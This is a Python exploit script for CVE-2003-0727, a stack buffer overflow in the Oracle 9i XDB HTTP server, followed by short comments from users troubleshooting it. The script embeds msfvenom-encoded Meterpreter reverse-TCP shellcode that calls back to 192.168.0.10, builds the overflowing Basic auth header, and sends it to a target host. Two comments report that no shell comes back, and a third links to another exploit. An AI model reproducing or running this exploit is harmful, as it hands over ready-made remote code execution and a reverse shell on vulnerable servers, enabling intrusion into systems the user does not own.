CVE-2003-0727 Oracle 9i XDB HTTP Server Authentication PASS stack-based buffer overflow

exp2003-0727.py

#!/usr/bin/python
import struct
import socket
import base64
import time

HOST = '192.168.0.11:8080'

#
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4448 -e x86/shikata_ga_nai --smallest -f py -v shellcode
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 1 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 308 (iteration=0)
# x86/shikata_ga_nai chosen with final size 308
# Payload size: 308 bytes
shellcode =  "\x81\xc4\xff\xef\xff\xff\x44"
shellcode += "\xbf\x7d\x40\x3a\xcd\xda\xcc\xd9\x74\x24\xf4\x58"
shellcode += "\x33\xc9\xb1\x47\x31\x78\x13\x83\xe8\xfc\x03\x78"
shellcode += "\x72\xa2\xcf\x31\x64\xa0\x30\xca\x74\xc5\xb9\x2f"
shellcode += "\x45\xc5\xde\x24\xf5\xf5\x95\x69\xf9\x7e\xfb\x99"
shellcode += "\x8a\xf3\xd4\xae\x3b\xb9\x02\x80\xbc\x92\x77\x83"
shellcode += "\x3e\xe9\xab\x63\x7f\x22\xbe\x62\xb8\x5f\x33\x36"
shellcode += "\x11\x2b\xe6\xa7\x16\x61\x3b\x43\x64\x67\x3b\xb0"
shellcode += "\x3c\x86\x6a\x67\x37\xd1\xac\x89\x94\x69\xe5\x91"
shellcode += "\xf9\x54\xbf\x2a\xc9\x23\x3e\xfb\x00\xcb\xed\xc2"
shellcode += "\xad\x3e\xef\x03\x09\xa1\x9a\x7d\x6a\x5c\x9d\xb9"
shellcode += "\x11\xba\x28\x5a\xb1\x49\x8a\x86\x40\x9d\x4d\x4c"
shellcode += "\x4e\x6a\x19\x0a\x52\x6d\xce\x20\x6e\xe6\xf1\xe6"
shellcode += "\xe7\xbc\xd5\x22\xac\x67\x77\x72\x08\xc9\x88\x64"
shellcode += "\xf3\xb6\x2c\xee\x19\xa2\x5c\xad\x75\x07\x6d\x4e"
shellcode += "\x85\x0f\xe6\x3d\xb7\x90\x5c\xaa\xfb\x59\x7b\x2d"
shellcode += "\xfc\x73\x3b\xa1\x03\x7c\x3c\xeb\xc7\x28\x6c\x83"
shellcode += "\xee\x50\xe7\x53\x0f\x85\x92\x56\x87\x2c\x68\x59"
shellcode += "\x85\x59\x6c\x59\x38\xfa\xf9\xbf\x6a\xaa\xa9\x6f"
shellcode += "\xca\x1a\x0a\xc0\xa2\x70\x85\x3f\xd2\x7a\x4f\x28"
shellcode += "\x78\x95\x26\x00\x14\x0c\x63\xda\x85\xd1\xb9\xa6"
shellcode += "\x85\x5a\x4e\x56\x4b\xab\x3b\x44\x3b\x5b\x76\x36"
shellcode += "\xed\x64\xac\x5d\x11\xf1\x4b\xf4\x46\x6d\x56\x21"
shellcode += "\xa0\x32\xa9\x04\xbb\xfb\x3f\xe7\xd3\x03\xd0\xe7"
shellcode += "\x23\x52\xba\xe7\x4b\x02\x9e\xbb\x6e\x4d\x0b\xa8"
shellcode += "\x23\xd8\xb4\x99\x90\x4b\xdd\x27\xcf\xbc\x42\xd7"
shellcode += "\x3a\x3d\xbe\x0e\x02\x4b\xae\x92"

exploit = 'A' * 442
exploit += '\xeb\x64\x90\x90'
exploit += struct.pack('<I', 0x60616d46)
exploit += '\x90' * 266
exploit += '\xeb\x10' + '\x90' * 109
exploit += shellcode
exploit += '\x90' * (400 - len(shellcode))

auth = 'test:' + exploit

req = 'GET / HTTP/1.1\r\nHost: ' + HOST + '\r\n'
req += 'Authorization: Basic ' + base64.b64encode(auth) + '\r\n\r\n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST.split(':')[0], int(HOST.split(':')[1])))

print 'Sending request (size: %d, overflowing buffer size: %d)' % (len(req), len(exploit))
print '\n' + req

print s.recv(2048).strip()
s.send(req)
print s.recv(2048).strip()
time.sleep(5)
s.close()

I've modified the code to include the right IP + changed the shellcode however I get the following and no reverse shell
Handler setup in metasploit

hello,
Same here .... any idea what the issue could be ?
thanks

Refer to this code. Would work like a charm
https://github.com/6odhi/Python-Exploit-for-Oracle-9i-XDB-Windows-x86---HTTP-PASS-Overflow-Metasploit-/blob/master/xdbHttpExpoit.py